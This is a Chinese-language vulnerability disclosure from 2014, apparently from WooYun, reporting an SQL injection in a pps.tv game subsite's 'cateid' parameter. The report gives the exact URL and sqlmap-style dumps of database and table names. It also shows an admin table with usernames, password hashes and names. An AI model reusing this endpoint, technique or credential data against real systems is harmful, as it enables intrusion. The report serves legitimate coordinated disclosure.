pps某分站存在sql注射漏洞

漏洞详情

披露状态:

2014-03-28: 细节已通知厂商并且等待厂商处理中
2014-03-28: 厂商已经确认,细节仅向厂商公开
2014-04-07: 细节向核心白帽子及相关领域专家公开
2014-04-17: 细节向普通白帽子公开
2014-04-27: 细节向实习白帽子公开
2014-05-12: 细节向公众公开

简要描述:

混个脸熟,别打脸~~

详细说明:

注入点:

http://sgmj.pps.tv/index.php?m=front&c=sgmj&a=news_list&cateid=136



参数cateid存在注射,只是检测,所以并未在进行下去

注入详情:

数据库

available databases [7]:
[*] dba
[*] dd.game.pps.tv
[*] information_schema
[*] mysql
[*] performance_schema
[*] qiy_game_pps_tv
[*] test



当前库:

dd.game.pps.tv

表:

Database: dd.game.pps.tv
[14 tables]
+--------------------------------+
| ppsdd_admins_resources |
| ppsdd_ads |
| ppsdd_cate_action |
| ppsdd_game_category |
| ppsdd_game_info |
| ppsdd_game_news |
| ppsdd_game_pic |
| ppsdd_kaifu_platform |
| ppsdd_kaifu_platform_game_data |
| ppsdd_link |
| ppsdd_resources |
| ppsdd_role |
| ppsdd_role_resources |
| ppsdd_system_admins |
+--------------------------------+



管理帐号

Table: ppsdd_system_admins
[5 entries]
+------------+------------------+----------------+
| admin_name | admin_passwd | admin_realname |
+------------+------------------+----------------+
| admin | 9a18c428cb38d5f2 | vanono |
| huyi | 587a910882016321 | ?? |
| kj | 587a910882016321 | kj |
| tq | 587a910882016321 | ?? |
| tuwenbin | 587a910882016321 | ??? |
+------------+------------------+----------------+



只是检测,并为继续深入!

漏洞证明:

.png

.png



.png

修复方案:

添加过滤语句或增加waf设备。

版权声明:转载请注明来源 卡卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-03-28 16:55

厂商回复:

感谢反馈!

最新状态:

暂无


漏洞评价: